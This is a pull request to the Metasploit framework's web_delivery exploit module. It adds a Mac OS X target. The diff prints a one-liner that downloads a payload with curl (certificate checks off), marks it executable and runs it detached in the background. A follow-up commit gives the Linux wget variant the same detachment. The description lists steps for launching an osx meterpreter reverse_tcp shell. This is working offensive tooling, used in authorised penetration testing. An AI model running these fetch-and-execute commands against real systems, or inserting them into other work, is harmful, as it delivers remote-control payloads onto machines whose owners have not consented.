### PR TITLE
Support osx in web_delivery

### DIFF
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'],
           ['URL', 'https://iwantmore.pizza/posts/amsi.html'],
         ],
-      'Platform'       => %w(python php win linux),
+      'Platform'       => %w(python php win linux osx),
       'Targets'        =>
         [
           ['Python', {
@@ -100,7 +100,11 @@ class MetasploitModule < Msf::Exploit::Remote
           ['Linux', {
             'Platform' => 'linux',
             'Arch' => [ARCH_X86, ARCH_X64]
-          }]
+          }],
+          ['Mac OS X', {
+            'Platform' => 'osx',
+            'Arch' => [ARCH_X86, ARCH_X64]
+          }],
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 19 2013'
@@ -144,6 +148,9 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'Linux'
       fname = Rex::Text.rand_text_alphanumeric 8
       print_line "wget -qO #{fname} --no-check-certificate #{get_uri}; chmod +x #{fname}; ./#{fname}&"
+    when 'Mac OS X'
+      fname = Rex::Text.rand_text_alphanumeric 8
+      print_line "curl -sk --output #{fname} #{get_uri}; chmod +x #{fname}; ./#{fname}& disown"
     end
   end
 
@@ -166,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     case target.name
-    when 'Linux'
+    when 'Linux', 'Mac OS X'
       data = generate_payload_exe
     when 'PSH (Binary)'
       data = generate_payload_exe

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -147,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_line("#{psh}")
     when 'Linux'
       fname = Rex::Text.rand_text_alphanumeric 8
-      print_line "wget -qO #{fname} --no-check-certificate #{get_uri}; chmod +x #{fname}; ./#{fname}&"
+      print_line "wget -qO #{fname} --no-check-certificate #{get_uri}; chmod +x #{fname}; ./#{fname}& disown"
     when 'Mac OS X'
       fname = Rex::Text.rand_text_alphanumeric 8
       print_line "curl -sk --output #{fname} #{get_uri}; chmod +x #{fname}; ./#{fname}& disown"


### PR DESCRIPTION
This add support for Mac OS X to `web_delivery` module.

Test w/

- [x] use exploit/multi/script/web_delivery
- [x] set payload osx/x64/meterpreter/reverse_tcp
- [x] set srvport 80
- [x] set SSL true
- [x] set target 7
- [x] set lhost eth0
- [x] set lport 443
- [x] exploit -j